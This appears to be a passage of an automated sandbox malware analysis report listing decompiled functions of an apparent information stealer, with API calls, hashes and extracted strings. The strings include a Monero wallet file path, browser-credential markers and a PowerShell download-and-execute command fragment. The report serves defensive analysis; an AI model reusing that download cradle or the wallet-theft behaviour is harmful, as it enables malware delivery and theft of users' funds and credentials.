                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: ddda5e63a6ba4a4f38276adb754c89717bc8fa9a427b2a9a09d68e8af4eaf7d2
                              • Instruction ID: ea1e99b02d30840362d1d9fa14daf5cb5d70c43a01c9439c2974faa814a2df8d
                              • Opcode Fuzzy Hash: ddda5e63a6ba4a4f38276adb754c89717bc8fa9a427b2a9a09d68e8af4eaf7d2
                              • Instruction Fuzzy Hash: 003150B290031867CB11FBA0DC85EED777CAB68704F404589B359A6081EFB4E6898F95
                              Function 00132C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00132D85
                              Strings
                              • ')", xrefs: 00132CB3
                              • <, xrefs: 00132D39
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00132CC4
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00132D04
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 51c3fe5f06991874ccb5634ab179cd56e66c9fc3634c6acf717f5eea90de708c
                              • Instruction ID: 1f653efa7ef9ba5802cf83ac7a8bd70726191e15505621ac67fc0fafead2f11a
                              • Opcode Fuzzy Hash: 51c3fe5f06991874ccb5634ab179cd56e66c9fc3634c6acf717f5eea90de708c
                              • Instruction Fuzzy Hash: 6241D371C50208AADB15FFA0C892FDDB774AF24300F904159F156B7191DF746A4ACF92
                              Function 00129E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00129F41
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 6bd8ddda9dc92c9fa480d1e420651041e7cf84ba90a02d389a11e6462f911513
                              • Instruction ID: 5a6c42d276ee0c977f67cc560e5d9b02638edb57673b65d98846330ae3f502e9
                              • Opcode Fuzzy Hash: 6bd8ddda9dc92c9fa480d1e420651041e7cf84ba90a02d389a11e6462f911513
                              • Instruction Fuzzy Hash: 8A618271A00258EFDB28EFA4DC96FED7775AF54300F408018F90A9F191EB746A05CB92
                              Function 001340B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,00FFD6A0,00000000,00020119,?), ref: 001340F4
                              • RegQueryValueExA.ADVAPI32(?,00FFE0E0,00000000,00000000,00000000,000000FF), ref: 00134118
                              • RegCloseKey.ADVAPI32(?), ref: 00134122
                              • lstrcat.KERNEL32(?,00000000), ref: 00134147
                              • lstrcat.KERNEL32(?,00FFE0F8), ref: 0013415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: b8bbf99eab979d9172ff5bad2068fc39c463c9a404eb373e6d806fbbcb1d55f4
                              • Instruction ID: a42351f87a61d13a71280eb247f90dad9b58a9400c88c8c390f6a12d059aa8fd
                              • Opcode Fuzzy Hash: b8bbf99eab979d9172ff5bad2068fc39c463c9a404eb373e6d806fbbcb1d55f4
                              • Instruction Fuzzy Hash: 3241A7B6D001086BDB15EBA0EC46FFE737DAB99300F008558F61557181EBB59B888FE2
                              Function 00137E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00137E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,00FEC518,00000000,00020119,?), ref: 00137E5E
                              • RegQueryValueExA.ADVAPI32(?,00FFD680,00000000,00000000,000000FF,000000FF), ref: 00137E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00137E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 06b96a86d5a162e464c726aafdf83aa3e7a5252136e4697dcc3443651ea50627
                              • Instruction ID: 300154db61fed61d19e809db2e72df4dc850fdf6d2aa0bd9902ab75fce717684
                              • Opcode Fuzzy Hash: 06b96a86d5a162e464c726aafdf83aa3e7a5252136e4697dcc3443651ea50627
                              • Instruction Fuzzy Hash: B7114CB1A44605EBDB15CF95DD49FBBBBBCEB48B10F108169F605A7280D7B468008FA2
                              Function 00139260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(00FFDFF0,?,?,?,0013140C,?,00FFDFF0,00000000), ref: 0013926C
                              • lstrcpyn.KERNEL32(0036AB88,00FFDFF0,00FFDFF0,?,0013140C,?,00FFDFF0), ref: 00139290
                              • lstrlen.KERNEL32(?,?,0013140C,?,00FFDFF0), ref: 001392A7
                              • wsprintfA.USER32 ref: 001392C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 35c6f6106a1c9d0e4e9bec9876a6f96868925956e05c43a0bac584e2647c16b5
                              • Instruction ID: 86a98f583625c5b618b268ab2b6e73cdf4a448aadbb7c0f9171fee93ab068ee4
                              • Opcode Fuzzy Hash: 35c6f6106a1c9d0e4e9bec9876a6f96868925956e05c43a0bac584e2647c16b5
                              • Instruction Fuzzy Hash: D001C475500608FFCB05DFECC998EAE7BB9EB48354F148148F909AB244C771AA40DF91
                              Function 001212A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001212B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001212BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001212D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001212F5
                              • RegCloseKey.ADVAPI32(?), ref: 001212FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: ac2cdbd08c9c0633e1efab92d05b3640b5bdb05ab2118662d36a09c3678a89dd
                              • Instruction ID: a36c424e3eaaf22243e1c6843911a777a873b48900df1fd2852d0edd5e1e6329
                              • Opcode Fuzzy Hash: ac2cdbd08c9c0633e1efab92d05b3640b5bdb05ab2118662d36a09c3678a89dd
                              • Instruction Fuzzy Hash: E701E6B5A40208BBDB15DFD4DC49FAEB7BCEB48701F108155FA05A7280D6B5AA018F51
                              Function 0013C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: d6d7bb6d56693708e42d4bf11d9801081fd8b27b608a6f161f98b898efcacb76
                              • Instruction ID: 1a89e42932381ef6f5543482f414a6b21d25215af54edc368dc504b01a82f521
                              • Opcode Fuzzy Hash: d6d7bb6d56693708e42d4bf11d9801081fd8b27b608a6f161f98b898efcacb76
                              • Instruction Fuzzy Hash: 474107B110079C5EDB258B24CC85FFBBBE89F45708F1444E8E9CA96182D3719B44CFA0
                              Function 00136630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00136663
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00136726
                              • ExitProcess.KERNEL32 ref: 00136755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: 91d028ea6d15a0a9f71f547e20646773c34c5c56ac5f4215dbc249b30e0b85cb
                              • Instruction ID: fdfffda215cb85891a40217923aca1273a8847429ba9a7ce239df8179f56018a
                              • Opcode Fuzzy Hash: 91d028ea6d15a0a9f71f547e20646773c34c5c56ac5f4215dbc249b30e0b85cb
                              • Instruction Fuzzy Hash: 2D31F9B1801218ABDB15EB90DC96BDEB77CAF54300F804199F30A76191DFB46B49CF6A
                              Function 001387C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00140E28,00000000,?), ref: 0013882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00138836
                              • wsprintfA.USER32 ref: 00138850
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 81d3220d428f9d4711ee7d5b1c7c95793b67b4158b8a8c541b065ba9423faf7d
                              • Instruction ID: 16dc0a5fb5836bf62fb1bf70913f29efc7071231e27ea8c971d1295f403fb9bf
                              • Opcode Fuzzy Hash: 81d3220d428f9d4711ee7d5b1c7c95793b67b4158b8a8c541b065ba9423faf7d
                              • Instruction Fuzzy Hash: 7A2130B1A40604AFDB05DFD4DD49FAEBBB8FB48701F108119F605B7280C7B9A9008FA1
                              Function 00138D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0013951E,00000000), ref: 00138D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00138D62
                              • wsprintfW.USER32 ref: 00138D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 21f9ab62abf70cfea518c61373aa373181177b680eb8d43e5419c95b742db0eb
